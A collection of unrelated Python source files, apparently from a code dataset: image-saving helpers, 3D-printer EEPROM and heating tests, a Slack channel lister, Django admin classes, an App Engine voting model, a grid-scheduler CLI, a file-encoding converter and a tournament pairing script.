raise UnknownFormat(format)
return extension
def suggest_extension(name, format):
original_extension = os.path.splitext(name)[1]
try:
suggested_extension = format_to_extension(format)
except UnknownFormat:
extension = original_extension
else:
if suggested_extension.lower() == original_extension.lower():
extension = original_extension
else:
try:
original_format = extension_to_format(original_extension)
except UnknownExtension:
extension = suggested_extension
else:
# If the formats match, give precedence to the original extension.
if format.lower() == original_format.lower():
extension = original_extension
else:
extension = suggested_extension
return extension
class FileWrapper(object):
def __init__(self, wrapped):
super(FileWrapper, self).__setattr__('_wrapped', wrapped)
def fileno(self):
try:
return self._wrapped.fileno()
except UnsupportedOperation:
raise AttributeError
def __getattr__(self, name):
return getattr(self._wrapped, name)
def __setattr__(self, name, value):
return setattr(self._wrapped, name, value)
def __delattr__(self, key):
return delattr(self._wrapped, key)
def save_image(img, outfile, format, options=None, autoconvert=True):
"""
Wraps PIL's ``Image.save()`` method. There are two main benefits of using
this function over PIL's:
1. It gracefully handles the infamous "Suspension not allowed here" errors.
2. It prepares the image for saving using ``prepare_image()``, which will do
some common-sense processing given the target format.
"""
options = options or {}
if autoconvert:
img, save_kwargs = prepare_image(img, format)
# Use returned from prepare_image arguments for base
# and update them with provided options. Then use the result
save_kwargs.update(options)
options = save_kwargs
# Attempt to reset the file pointer.
try:
outfile.seek(0)
except AttributeError:
pass
def save(fp):
with quiet():
img.save(fp, format, **options)
# Some versions of PIL only catch AttributeErrors where they should also
# catch UnsupportedOperation exceptions. To work around this, we wrap the
# file with an object that will raise the type of error it wants.
if any(isinstance(outfile, t) for t in string_types):
# ...but don't wrap strings.
wrapper = outfile
else:
wrapper = FileWrapper(outfile)
try:
save(wrapper)
except IOError:
# PIL can have problems saving large JPEGs if MAXBLOCK isn't big enough,
# So if we have a problem saving, we temporarily increase it. See
# http://github.com/matthewwithanm/django-imagekit/issues/50
# https://github.com/matthewwithanm/django-imagekit/issues/134
# https://github.com/python-imaging/Pillow/issues/148
# https://github.com/matthewwithanm/pilkit/commit/0f914e8b40e3d30f28e04ffb759b262aa8a1a082#commitcomment-3885362
# MAXBLOCK must be at least as big as...
new_maxblock = max(
(len(options['exif']) if 'exif' in options else 0) + 5, # ...the entire exif header block
img.size[0] * 4, # ...a complete scan line
3 * img.size[0] * img.size[1], # ...3 bytes per every pixel in the image
)
if new_maxblock < ImageFile.MAXBLOCK:
raise
old_maxblock = ImageFile.MAXBLOCK
ImageFile.MAXBLOCK = new_maxblock
try:
save(wrapper)
finally:
ImageFile.MAXBLOCK = old_maxblock
try:
outfile.seek(0)
except AttributeError:
pass
return outfile
class quiet(object):
"""
A context manager for suppressing the stderr activity of PIL's C libraries.
Based on http://stackoverflow.com/a/978264/155370
"""
def __enter__(self):
try:
self.stderr_fd = sys.__stderr__.fileno()
except AttributeError:
# In case of Azure, the file descriptor is not present so we can return
# from here
return
except UnsupportedOperation:
# In case of Windows 2016, the file descriptor is not present so we can return
# from here
return
try:
self.null_fd = os.open(os.devnull, os.O_RDWR)
except OSError:
# If dev/null isn't writeable, then they just have to put up with
# the noise.
return
self.old = os.dup(self.stderr_fd)
os.dup2(self.null_fd, self.stderr_fd)
def __exit__(self, *args, **kwargs):
if not getattr(self, 'null_fd', None):
return
if not getattr(self, 'old', None):
return
os.dup2(self.old, self.stderr_fd)
os.close(self.null_fd)
os.close(self.old)
def prepare_image(img, format):
"""
Prepares the image for saving to the provided format by doing some
common-sense conversions. This includes things like preserving transparency
and quantizing. This function is used automatically by ``save_image()``
immediately before saving unless you specify ``autoconvert=False``. It is
provided as a utility for those doing their own processing.
:param img: The image to prepare for saving.
:param format: The format that the image will be saved to.
"""
make_opaque = False
save_kwargs = {}
format = format.upper()
if img.mode == 'RGBA':
if format in RGBA_TRANSPARENCY_FORMATS:
pass
elif format in PALETTE_TRANSPARENCY_FORMATS:
# If you're going from a format with alpha transparency to one
# with palette transparency, transparency values will be
# snapped: pixels that are more opaque than not will become
# fully opaque; pixels that are more transparent than not will
# become fully transparent. This will not produce a good-looking
# result if your image contains varying levels of opacity; in
# that case, you'll probably want to use a processor to composite
# the image on a solid color. The reason we don't do this by
# default is because not doing so allows processors to treat
# RGBA-format images as a super-type of P-format images: if you
# have an RGBA-format image with only a single transparent
# color, and save it as a GIF, it will retain its transparency.
# In other words, a P-format image converted to an
# RGBA-formatted image by a processor and then saved as a
# P-format image will give the expected results.
# Work around a bug in PIL: split() doesn't check to see if
# img is loaded.
img.load()
alpha = img.split()[-1]
mask = Image.eval(alpha, lambda a: 255 if a <= 128 else 0)
img = img.convert('RGB').convert('P', palette=Image.ADAPTIVE,
colors=255)
img.paste(255, mask)
save_kwargs['transparency'] = 255
else:
# Simply converting an RGBA-format image to an RGB one creates a
# gross result, so we paste the image onto a white background. If
# that's not what you want, that's fine: use a processor to deal
# with the transparency however you want. This is simply a
# sensible default that will always produce something that looks
# good. Or at least, it will look better than just a straight
# conversion.
make_opaque = True
elif img.mode == 'P':
if format in PALETTE_TRANSPARENCY_FORMATS:
try:
save_kwargs['transparency'] = img.info['transparency']
except KeyError:
pass
elif format in RGBA_TRANSPARENCY_FORMATS:
# Currently PIL doesn't support any RGBA-mode formats that
# aren't also P-mode formats, so this will never happen.
img = img.convert('RGBA')
else:
make_opaque = True
else:
img = img.convert('RGB')
# GIFs are always going to be in palette mode, so we can do a little
# optimization. Note that the RGBA sources also use adaptive
# quantization (above). Images that are already in P mode don't need
# any quantization because their colors are already limited.
if format == 'GIF':
img = img.convert('P', palette=Image.ADAPTIVE)
if make_opaque:
from .processors import MakeOpaque
img = MakeOpaque().process(img).convert('RGB')
if format == 'JPEG':
save_kwargs['optimize'] = True
return img, save_kwargs
def process_image(img, processors=None, format=None, autoconvert=True, options=None):
from .processors import ProcessorPipeline
original_format = img.format
# Run the processors
img = ProcessorPipeline(processors or []).process(img)
format = format or img.format or original_format or 'JPEG'
options = options or {}
return img_to_fobj(img, format, autoconvert, **options)
| StarcoderdataPython |
9653792 | <gh_stars>1-10
import pyeccodes.accessors as _
def load(h):
h.alias('localDefinitionNumber', 'grib2LocalSectionNumber')
_.Template('grib2/local.[centreForLocal:l].[grib2LocalSectionNumber:l].def').load(h)
h.add(_.Position('offsetAfterLocalSection'))
| StarcoderdataPython |
11308414 |
"""
A suite of tests to be run on a replicator with the s3g python module. These tests are broken down into several categories:
"""
import os, sys
lib_path = os.path.abspath('../')
sys.path.append(lib_path)
lib_path = os.path.abspath('../s3g/')
sys.path.append(lib_path)
try:
import unittest2 as unittest
except ImportError:
import unittest
import optparse
import serial
import io
import struct
import array
import time
import s3g
import random
import csv
import matplotlib.pyplot as plt
from coding import *
axis_length_offsets = {
'x_axis':[0x0, '<I'],
'y_axis':[0x04, '<I'],
'z_axis':[0x08, '<I'],
'a_axis':[0x012, '<I'],
'b_axis':[0x016, '<I']
}
eeprom_acceleration_offsets = {
'active':[0x00,'<B'],
'default_rate':[0x02,'<h'],
'x_axis_rate':[0x04, '<h'],
'y_axis_rate':[0x06, '<h'],
'z_axis_rate':[0x08, '<h'],
'a_axis_rate':[0x0A, '<h'],
'b_axis_rate':[0x0C, '<h'],
'x_axis_jerk':[0x0E, '<BB'],
'y_axis_jerk':[0x10, '<BB'],
'z_axis_jerk':[0x12, '<BB'],
'a_axis_jerk':[0x14, '<BB'],
'b_axis_jerk':[0x16, '<BB'],
'minimum_speed':[0x18, '<h'],
'defaults_flag':[0x1A, '<B']
}
eeprom_map =[
{'name':'acceleration_settings', 'offset':0x016E, 'variables':eeprom_acceleration_offsets},
{'name':'axis_lengths', 'offset':0x018C, 'variables':axis_length_offsets},
{'name':'first_boot_flag', 'offset':0x0156, 'variables':{'first_boot':[0, '>B']}}
]
class ReplicatorStateTests(unittest.TestCase):
def setUp(self):
self.s3g = s3g.s3g()
self.s3g.file = serial.Serial(options.serialPort, '115200', timeout=1)
self.s3g.writer = s3g.StreamWriter(self.s3g.file)
self.s3g.SetExtendedPosition([0, 0, 0, 0, 0])
self.s3g.AbortImmediately()
time.sleep(2)
def tearDown(self):
self.s3g.file.close()
def ReadEEpromVariable(self, map_dict, variable):
"""
read a variable stored in eeprom
@param name: dictionary value for eeprom_map 'name'
@param variable: dictionary value for 'variable' sub set in eeprom_map dict
"""
offset = map_dict['offset'] + map_dict['variables'][variable][0]
data_type = map_dict['variables'][variable][1]
data = UnpackResponse(data_type, self.s3g.ReadFromEEPROM(offset, struct.calcsize(data_type)))
print [variable, data]
def CheckVariableRange(self, data, map_dict, variable):
"""
read a variable stored in eeprom
@param name: dictionary value for eeprom_map 'name'
@param variable: dictionary value for 'variable' sub set in eeprom_map dict
"""
valid_range = map_dict['variables'][variable][2]
self.assertTrue(data in valid_range)
def EEpromCheckForValidEntries(self):
"""
This test checks eeprom values
Additionaly eeprom checks may be added in the future
"""
for field in eeprom_map:
for var in field['variables']:
data = self.ReadEEpromVariable(field, var)
"""
# acceleration on/off
data = UnpackResponse('B', self.s3g.ReadFromEEPROM(acceleration_map_start + eeprom_acceleration_offsets['active'], 1))
print data[0]
self.assertTrue( data[0] in [0,1])
# default acceleration rate
data = UnpackResponse('h', self.s3g.ReadFromEEPROM(acceleration_map_start + eeprom_acceleration_offsets['default_rate'], 2))
print data[0]
self.assertTrue(data[0] in range(0,5000))
# default axis acceleration rates
for i in range(0,10, 2):
data = UnpackResponse('h', self.s3g.ReadFromEEPROM(acceleration_map_start+eeprom_acceleration_offsets['axis_rate'] +i, 2))
print data[0]
self.assertTrue(data[0] in range(0,5000))
# default axis jerk rates
for i in range(0,8,2):
data = self.s3g.ReadFromEEPROM(acceleration_map_start + eeprom_acceleration_offsets['axis_jerk']+ i, 2)
byte_data = UnpackResponse('BB', data);
float_data = (float(byte_data[0]) + float(byte_data[1]) / 256.0)
print float_data
self.assertTrue(float_data > 0.0 and float_data < 40.0)
# default minimum speed
data = UnpackResponse('h', self.s3g.ReadFromEEPROM(acceleration_map_start+eeprom_acceleration_offsets['minimum_speed'], 2))
print data[0]
self.assertTrue(data[0] in range(0,40))
# acceleration defaults initialized flag
data = UnpackResponse('B', self.s3g.ReadFromEEPROM(acceleration_map_start+eeprom_acceleration_offsets['defaults_flag'], 1))
print data[0]
self.assertTrue(data[0] in [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80])
"""
def EEpromTestResetToFactory(self):
self.s3g.ResetToFactory()
self.EEpromCheckForValidEntries()
def EEpromTestFullReset(self):
for i in range(0, eeprom_map):
self.s3g.WriteToEEPROM(i, [0xFF])
self.s3g.Reset()
self.EEpromCheckForValidEntries()
def EEpromWriteInvalidValues(self):
for i in range (acceleration_map_start + 10, eeprom_map):
self.s3g.WriteToEEPROM(i, [random.randint(0,255)])
self.EEpromCheckForValidEntries()
def HeatingErrorTest(self):
tool_temps = []
heat_cycle = 0
csv_writer = csv.writer(open(options.filename, 'wb'), delimiter = ',')
print "\n"
tool_num = 2
if options.toolCount == "single":
tool_num = 1
while(heat_cycle < 50):
for tool_index in range(0,tool_num):
print "heat_cycle: %d" % (heat_cycle)
#randomize whether tool or platform is heated first
tool_first = random.randint(0,1)
if tool_first is 0:
self.s3g.SetToolheadTemperature(tool_index,225);
self.s3g.SetPlatformTemperature(tool_index,110);
else:
self.s3g.SetPlatformTemperature(tool_index,110);
self.s3g.SetToolheadTemperature(tool_index,225);
# move axes to simulate start.gcode
self.s3g.FindAxesMaximums(['x', 'y'], 300, 60)
self.s3g.FindAxesMinimums(['z'], 200, 60)
self.s3g.RecallHomePositions(['x', 'y', 'z', 'a', 'b'])
AnchorLocation = [-110.5*94.1397, -74*94.1397, 150*400, 0, 0]
self.s3g.QueueExtendedPoint(AnchorLocation, 200)
start_time = time.time()
finished = False
while finished is False:
tool_temps.append(self.s3g.GetToolheadTemperature(tool_index))
csv_writer.writerow([time.time(), tool_temps[-1]])
tool_status = self.s3g.GetToolStatus(tool_index)
for error, status in tool_status.iteritems() :
if status is True:
finished = True
if error is not "ExtruderReady":
print tool_status
print "tool head %d fail" % (tool_index)
if tool_first is True:
print "tool heated before platform"
else:
print "tool heated after platform"
print "elapsed time: %d" % (time.time() - start_time)
print "heat cycles: %d" % (heat_cycle)
plt.plot(tool_temps)
plt.show()
self.assertFalse(status)
time.sleep(0.3)
tool_temps.append(self.s3g.GetToolheadTemperature(tool_index))
csv_writer.writerow([time.time(), tool_temps[-1]])
print "time: %d temp: %d count: %d " % (time.time() - start_time, tool_temps[-1], len(tool_temps))
self.s3g.SetToolheadTemperature(tool_index, 0)
self.s3g.SetPlatformTemperature(tool_index, 0)
# give the tool a random amount of time to cool
cool_time = (float(random.randint(1,16))/2) * 60
start_time = time.time()
print "cool time: %f minutes" % (cool_time/60)
while time.time() - start_time < cool_time:
tool_temps.append(self.s3g.GetToolheadTemperature(tool_index))
csv_writer.writerow([time.time(), tool_temps[-1]])
time.sleep(0.03)
heat_cycle += 1
plt.plot(tool_temps)
plt.show()
if __name__ == '__main__':
parser = optparse.OptionParser()
parser.add_option("-p", "--port", dest="serialPort", default="/dev/ttyACM0")
parser.add_option("-f", "--file", dest="filename", default="temp_data_back.csv")
parser.add_option("-t", "--tool_count", dest="toolCount", default="dual")
(options, args) = parser.parse_args()
del sys.argv[1:]
tests = unittest.TestSuite()
tests.addTest(ReplicatorStateTests('EEpromCheckForValidEntries'))
unittest.TextTestRunner(verbosity=2).run(tests)
| StarcoderdataPython |
5083486 | <reponame>cpieri/api_slack
import requests
from error import *
def list_channel(token):
print ('Your token is: {token}'.format(token=token))
pink = '\033[38;5;206m'
cyan = '\033[36m'
endl = '\033[0m'
channels = requests.get('https://slack.com/api/{type}.list?limit=100&token={t}&types=public_channel,private_channel,mpim'.format(type='conversations', t=token)).json()
chans = channels['channels']
for chan in chans:
if chan['is_private']:
print (pink + 'Channel privé : {name}'.format(name=chan['name']) + endl)
else:
print (cyan + 'Channel public : {name}'.format(name=chan['name']) + endl) | StarcoderdataPython |
3551269 | from adminsortable.admin import SortableTabularInline, NonSortableParentAdmin
from django.contrib import admin
from django.db.models import Count
from simple_history.admin import SimpleHistoryAdmin
from music.models import Pays, Artiste, Style, Label, Playlist, Musique, MusiquePlaylist, Lien, Plateforme, LienPlaylist
@admin.register(Pays)
class PaysAdmin(admin.ModelAdmin):
list_display = ('nom',)
search_fields = ('nom',)
class MusiqueStyleInline(admin.TabularInline):
model = Musique.styles.through
autocomplete_fields = ('musique',)
@admin.register(Style)
class StyleAdmin(admin.ModelAdmin):
list_display = ('nom',)
search_fields = ('nom',)
prepopulated_fields = {'slug': ('nom',), }
save_on_top = True
inlines = [MusiqueStyleInline]
class LienPlaylistInline(admin.TabularInline):
model = LienPlaylist
readonly_fields = ('date_creation',)
class MusiquePlaylistInline(SortableTabularInline):
model = MusiquePlaylist
autocomplete_fields = ('musique',)
readonly_fields = ('date_ajout',)
@admin.register(Playlist)
class PlaylistAdmin(NonSortableParentAdmin):
list_display = ('nom', 'description', 'createur', 'nb_musique')
search_fields = ('nom',)
prepopulated_fields = {'slug': ('nom',), }
save_on_top = True
autocomplete_fields = ('createur',)
list_select_related = ('createur',)
inlines = [LienPlaylistInline, MusiquePlaylistInline]
def get_changeform_initial_data(self, request):
return {'createur': request.user}
def get_queryset(self, request):
qs = super(PlaylistAdmin, self).get_queryset(request)
return qs.annotate(nb_musique=Count('musiqueplaylist'))
def nb_musique(self, obj):
return obj.nb_musique
nb_musique.short_description = 'Nombre de musique'
nb_musique.admin_order_field = 'nb_musique'
class MusiqueInline(admin.StackedInline):
model = Musique
prepopulated_fields = {'slug': ('titre',), }
autocomplete_fields = ('featuring', 'remixed_by', 'styles', 'createur')
fk_name = 'artiste'
extra = 0
# TODO Remplir automatiquement le créateur pour la musique
class MusiqueRemixInline(admin.StackedInline):
model = Musique
prepopulated_fields = {'slug': ('titre',), }
autocomplete_fields = ('featuring', 'remixed_by', 'styles',)
fk_name = 'remixed_by'
extra = 0
verbose_name_plural = 'remixes'
verbose_name = 'remix'
# TODO Remplir automatiquement le créateur pour le remix
@admin.register(Artiste)
class ArtisteAdmin(SimpleHistoryAdmin):
list_display = ('nom_artiste', 'nom', 'prenom', 'ville', 'pays', 'date_creation', 'date_modification')
list_filter = ('styles', 'labels', 'createur')
search_fields = (
'nom_artiste', 'slug', 'prenom', 'nom',
)
date_hierarchy = 'date_creation'
ordering = ('-date_modification',)
prepopulated_fields = {'slug': ('nom_artiste',), }
readonly_fields = ('soundcloud_followers', )
autocomplete_fields = ('styles', 'pays', 'createur')
save_on_top = True
inlines = [MusiqueInline, MusiqueRemixInline]
def get_changeform_initial_data(self, request):
return {'createur': request.user}
class LienInline(admin.TabularInline):
model = Lien
class PlaylistInline(admin.TabularInline):
model = Playlist.musiques.through
autocomplete_fields = ('playlist',)
@admin.register(Musique)
class MusiqueAdmin(SimpleHistoryAdmin):
list_display = ('artiste_display', 'titre_display', 'album', 'label', 'createur',
'date_creation', 'date_modification', 'nombre_vue')
list_display_links = ('titre_display',)
list_filter = ('styles', 'remixed_by')
search_fields = (
'titre', 'slug', 'artiste__nom_artiste', 'artiste__slug', 'remixed_by__nom_artiste', 'remixed_by__slug',
'featuring__nom_artiste', 'featuring__slug', 'album', 'label__nom'
)
date_hierarchy = 'date_creation'
ordering = ('-date_modification',)
prepopulated_fields = {'slug': ('titre',), }
autocomplete_fields = ('artiste', 'featuring', 'remixed_by', 'styles', 'label')
list_select_related = ('artiste', 'remixed_by', 'createur__user', 'label')
save_on_top = True
list_per_page = 20
inlines = [PlaylistInline, LienInline]
def get_changeform_initial_data(self, request):
return {'createur': request.user}
@admin.register(Plateforme)
class PlateformeAdmin(admin.ModelAdmin):
list_display = ('nom', 'slug')
search_fields = ('nom',)
prepopulated_fields = {'slug': ('nom',)}
@admin.register(LienPlaylist)
class LienPlaylistAdmin(admin.ModelAdmin):
list_display = ('id', 'playlist', 'url', 'plateforme', 'date_creation')
list_filter = ('plateforme',)
search_fields = ('playlist__nom', 'plateforme__nom')
date_hierarchy = 'date_creation'
autocomplete_fields = ('playlist',)
list_select_related = ('playlist', 'plateforme')
@admin.register(Lien)
class LienAdmin(admin.ModelAdmin):
list_display = ('id', 'musique', 'url', 'plateforme', 'createur', 'click_count', 'date_creation', 'date_validation')
list_filter = ('plateforme',)
search_fields = (
'musique__titre', 'musique__artiste__nom_artiste', 'plateforme__nom'
)
date_hierarchy = 'date_creation'
autocomplete_fields = ('musique',)
list_select_related = ('musique__artiste', 'musique__remixed_by', 'createur__user', 'plateforme')
list_per_page = 30
def get_changeform_initial_data(self, request):
return {'createur': request.user}
@admin.register(Label)
class LabelAdmin(admin.ModelAdmin):
list_display = ('nom', 'description')
search_fields = ('nom', 'artistes__nom_artiste', 'styles__nom')
prepopulated_fields = {'slug': ('nom',), }
autocomplete_fields = ('artistes', 'styles')
| StarcoderdataPython |
12822064 | import puzzle_1
import puzzle_2
# Read lines from input file and assign them to a list called input
with open("../input.txt", "r") as information:
input = information.readlines()
# Declares variables for each of the puzzles solutions and assigns respective functions to it
# (See puzzle_1 and puzzle_2 python files for each function code)
puzzle1_solution = puzzle_1.solve(input)
# puzzle2_solution = puzzle_2.solve(data)
# Prints both solutions
print("Puzzle 1 Solution :" , puzzle1_solution)
# print("Puzzle 2 Solution :" , puzzle2_solution) | StarcoderdataPython |
3534070 | # Uses Sharded vote counter, to increase vote throughput.
# https://cloud.google.com/appengine/articles/sharding_counters
# Import external modules.
from google.appengine.ext import ndb
import math
# Import app modules.
from configuration import const as conf
from constants import Constants
import logging
import proposal
import reasonVote
import traceback
# Constants
const = Constants()
const.MAX_RETRY = 3
const.MAX_VOTE_RETRY = 3
const.CHAR_LENGTH_UNIT = 100
# Persistent record
# Parent key: proposal? No, use key-properties instead, for better throughput.
class Reason(ndb.Model):
proposalId = ndb.StringProperty() # Primary key. Needed to retrieve all reasons for a single proposal.
requestId = ndb.StringProperty() # Search index. Needed to retrieve all reasons for request.
content = ndb.StringProperty()
proOrCon = ndb.StringProperty() # { 'pro', 'con' }
creator = ndb.StringProperty()
allowEdit = ndb.BooleanProperty()
voteCount = ndb.IntegerProperty( default=0 )
score = ndb.FloatProperty( default=0 )
def voteCountToScore( voteCount, content ):
contentLen = len(content)
# score = votes per CHAR_LENGTH_UNITs used
unitsUsed = float(contentLen) / float(const.CHAR_LENGTH_UNIT) if contentLen >= const.CHAR_LENGTH_UNIT else 1.0
return float(voteCount) / float(unitsUsed)
@ndb.transactional( retries=const.MAX_RETRY )
def setEditable( reasonId, editable ):
reasonRecord = Reason.get_by_id( int(reasonId) )
reasonRecord.allowEdit = editable
reasonRecord.put()
# Returns a group of query futures.
def retrieveTopReasonsAsync( proposalId, maxReasons ):
proposalIdStr = str( proposalId )
maxReasonsPerColumn = maxReasons / 2
reasonRecordsFutures = []
reasonRecordsFuture = Reason.query( Reason.proposalId==proposalIdStr, Reason.proOrCon==conf.PRO ).order(
-Reason.score ).fetch_async( maxReasonsPerColumn )
reasonRecordsFutures.append( reasonRecordsFuture )
reasonRecordsFuture = Reason.query( Reason.proposalId==proposalIdStr, Reason.proOrCon==conf.CON ).order(
-Reason.score ).fetch_async( maxReasonsPerColumn )
reasonRecordsFutures.append( reasonRecordsFuture )
return [ f for f in reasonRecordsFutures if f is not None ]
# Returns a group of query records.
def fetchReasonRecordsFutures( reasonRecordsFutures ):
reasonRecords = []
for f in reasonRecordsFutures:
if f is not None:
reasonRecordsBatch = f.get_result()
if reasonRecordsBatch is not None:
reasonRecords.extend( reasonRecordsBatch )
return reasonRecords
# Assumes that user can vote for only 1 reason per proposal.
# Parameters: voteUp:boolean
# Returns success:boolean, updated Reason, updated ReasonVote
def vote( requestId, proposalId, reasonId, userId, voteUp, isRequestForProposals=False ):
success, reasonRec, reasonVoteRec, prosInc, consInc = _voteTransaction( requestId, proposalId, reasonId, userId, voteUp ) # Transaction
if success and isRequestForProposals and (prosInc != 0 or consInc != 0):
logging.debug( 'reason.vote() incrementAsync() starting' )
proposal.incrementTasklet( requestId, proposalId, prosInc, consInc ) # Async
logging.debug( 'reason.vote() incrementAsync() done' )
return success, reasonRec, reasonVoteRec
# Assumes that user can vote for only 1 reason per proposal.
# Parameters: voteUp:boolean
# Returns success:boolean, Reason, ReasonVote
@ndb.transactional(xg=True, retries=const.MAX_VOTE_RETRY) # Cross-table is ok because vote record (user x proposal) is not contended, and reason vote count record is locking anyway.
def _voteTransaction( requestId, proposalId, reasonId, userId, voteUp ):
voteFlagSuccess, voteCountIncrements, voteRecord = reasonVote._setVote( requestId, proposalId, reasonId, userId, voteUp ) # Uncontested
logging.debug( 'vote() voteFlagSuccess=' + str(voteFlagSuccess) + ' voteCountIncrements=' + str(voteCountIncrements) + ' voteRecord=' + str(voteRecord) )
if not voteFlagSuccess: return False, None, voteRecord, 0, 0
# If any reason vote increment fails... then undo reasonVote._setVote() and all reason vote increments via transaction.
reasonRecord = None
prosInc = 0
consInc = 0
for incReasonId, voteCountIncrement in voteCountIncrements.iteritems():
incReasonRecord = _incrementVoteCount( incReasonId, voteCountIncrement ) # Contested lightly
if str(incReasonRecord.key.id()) == reasonId: reasonRecord = incReasonRecord
if incReasonRecord.proOrCon == conf.PRO: prosInc += voteCountIncrement
elif incReasonRecord.proOrCon == conf.CON: consInc += voteCountIncrement
return True, reasonRecord, voteRecord, prosInc, consInc
# Increment vote count, inside another transaction.
# Returns updated Reason record, or throws transaction Conflict exception.
def _incrementVoteCount( reasonId, amount ):
reasonRecord = Reason.get_by_id( int(reasonId) )
reasonRecord.voteCount += amount
reasonRecord.score = voteCountToScore( reasonRecord.voteCount, reasonRecord.content )
reasonRecord.put()
return reasonRecord
| StarcoderdataPython |
6676148 | <reponame>ngvozdiev/ncode
import numpy as np
import matplotlib.pylab as plt
def PlotCDF(x, label):
x = np.sort(x)
y = np.arange(len(x))/float(len(x))
plt.plot(x, y, label=label)
for filename, label in {{files_and_labels}}:
data = np.loadtxt(filename)
PlotCDF(data, label=label)
ax = plt.gca()
for x_pos, label in {{lines_and_labels}}:
next_color = ax._get_lines.get_next_color()
plt.axvline(x_pos, label=label, color=next_color)
plt.title('{{title}}')
plt.xlabel('{{xlabel}}')
plt.ylabel('{{ylabel}}')
plt.legend()
plt.show()
| StarcoderdataPython |
8042738 | <gh_stars>0
import argparse
from threading import Thread
from virtualgrid.grid_scheduler import GridScheduler
from virtualgrid.node import Node
from virtualgrid.resource_manager import ResourceManager
from virtualgrid.vector_clock import VectorClock
def start_node(args):
node = Node(args.port, VectorClock(args.pid, args.np))
node.listen()
def start_resource_manager(args):
rm = ResourceManager(args.id, 2, args.gs_address, args.node_addresses, args.port, VectorClock(args.pid, args.np))
listen_thread = Thread(target=rm.listen)
listen_thread.start()
scheduler_thread = Thread(target=rm.run_job_scheduler)
scheduler_thread.start()
def start_grid_scheduler(args):
rms = {}
for rm in args.rms:
rm_id, rm_address = rm.split(',')
rms[rm_id] = rm_address
gs = GridScheduler(rms, VectorClock(args.pid, args.np), args.port)
if args.gs_mode == 'accept':
gs.listen()
elif args.gs_mode == 'reschedule':
gs.run_rescheduling()
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--port',
type=int,
help=f'port to listen on for commands from a resource manager.',
required=True
)
parser.add_argument(
'--pid',
type=int,
required=True,
help='process id of this resource manager (has to be unique)'
)
parser.add_argument(
'--np',
type=int,
required=True,
help='number of nodes in the system (np >= id)'
)
subparsers = parser.add_subparsers(dest='module')
subparsers.required = True
parser_node = subparsers.add_parser('node', help='start a node')
parser_rm = subparsers.add_parser('rm', help='start a resource manager')
parser_rm.add_argument('--gs-address', type=str, required=True,
help='address of a grid scheduler formatted as ip:port')
parser_rm.add_argument('node_addresses', metavar='NODE_ADDR', type=str, nargs='+',
help='address of nodes belonging to this cluster formatted as ip:port')
parser_rm.add_argument('--id', type=int, required=True,
help='id of the resource manager (has to be unique)')
parser_gs = subparsers.add_parser('gs', help='start a grid scheduler')
gs_subparsers = parser_gs.add_subparsers(dest='gs_mode')
gs_subparsers.required = True
gs_accept = gs_subparsers.add_parser('accept', help='accept jobs from resource managers')
gs_accept.add_argument('rms', metavar='RM', type=str, nargs='+',
help='address and IDs of resource managers formatted as id,ip:port')
gs_reschedule = gs_subparsers.add_parser('reschedule', help='reschedule jobs to keep the load even')
gs_reschedule.add_argument('rms', metavar='RM', type=str, nargs='+',
help='address and IDs of resource managers formatted as id,ip:port')
args = parser.parse_args()
if args.module == 'node':
start_node(args)
elif args.module == 'rm':
start_resource_manager(args)
elif args.module == 'gs':
start_grid_scheduler(args)
else:
args.print_help()
if __name__ == '__main__':
main()
| StarcoderdataPython |
272711 | <reponame>tagwan/scripts<gh_stars>0
# !/usr/bin/env python
# -*- coding:utf-8 -*-
"""
批量修改文件编码,例如从ansi转为utf-8
"""
import os
import sys
import codecs
import chardet
def get_file_extension(file):
(filepath, filename) = os.path.split(file)
(shortname, extension) = os.path.splitext(filename)
return extension
def get_file_encode(filename):
with open(filename, 'rb') as f:
data = f.read()
encoding_type = chardet.detect(data)
# print(encoding_type)
return encoding_type
def process_dir(root_path):
for path, dirs, files in os.walk(root_path):
for file in files:
file_path = os.path.join(path, file)
process_file(file_path, file_path)
def process_file(filename_in, filename_out):
"""
filename_in :输入文件(全路径+文件名)
filename_out :保存文件(全路径+文件名)
文件编码类型: 'windows-1251','UTF-8-SIG'
"""
extension = get_file_extension(filename_in).lower()
if not (extension == '.c' or extension == '.h' or extension == '.cpp' or extension == '.hpp'):
return
# 输出文件的编码类型
dest_file_encode = 'utf-8'
encoding_type = get_file_encode(filename_in)
src_file_encode = encoding_type['encoding']
if src_file_encode == 'utf-8':
return
elif src_file_encode is None:
src_file_encode = 'windows-1251'
print("[Convert]File:" + filename_in + " from:" + encoding_type['encoding'] + " to:UTF-8")
try:
with codecs.open(filename=filename_in, mode='r', encoding=src_file_encode) as fi:
data = fi.read()
with open(filename_out, mode='w', encoding=dest_file_encode) as fo:
fo.write(data)
fo.close()
with open(filename_out, 'rb') as f:
data = f.read()
print(chardet.detect(data))
except Exception as e:
print(e)
def dump_file_encode(root_path):
"""
打印指定文件夹下编码
:param root_path:
:return:
"""
for path, dirs, files in os.walk(root_path):
for file in files:
filename = os.path.join(path, file)
with open(filename, 'rb') as f:
data = f.read()
encoding_type = chardet.detect(data)
print("FILE:" + file + " ENCODE:" + str(encoding_type))
def convert(path):
"""
批量转换文件编码格式
path :输入文件或文件夹
"""
# sys.argv[1], sys.argv[2]
if os.path.isfile(path):
process_file(path, path)
elif os.path.isdir(path):
process_dir(path)
if __name__ == '__main__':
# convert(r'E:\Workspace\cplus\tlbb-master\tlbb-master')
convert(r'E:\Workspace\cplus\tlbb-master\tlbb-master')
| StarcoderdataPython |
11281420 | <filename>vagrant/myTourney.py
__author__ = 'erik'
from tournament import *
import math
import random
import decimal
db = connect()
deletePlayers()
deleteMatches()
registerPlayer("Ace")
registerPlayer("Jimmy")
registerPlayer("Phil")
registerPlayer("Sport")
registerPlayer("Ed")
registerPlayer("Lucy")
registerPlayer("Jake")
registerPlayer("Adam")
registerPlayer("Ace2")
registerPlayer("Jimmy2")
registerPlayer("Phil2")
registerPlayer("Sport2")
registerPlayer("Ed2")
registerPlayer("Lucy2")
registerPlayer("Jake2")
registerPlayer("Adam2")
registerPlayer("Jake3")
# registerPlayer("Adam3")
count = countPlayers()
rounds = int(math.ceil(math.log(count,2)))
currentRound = 0
for x in range(0, rounds):
print 'Round {0} Matches\n'.format(x+1)
playerPairings = swissPairings()
for playerPair in playerPairings:
if playerPair[0] == -1 or playerPair[2] == -1:
# this is a bye match
if playerPair[0] != -1:
reportMatch(playerPair[0], playerPair[2])
print 'Winner: {0}\tLoser: {1}'.format(playerPair[1], playerPair[3])
else:
reportMatch(playerPair[2], playerPair[0])
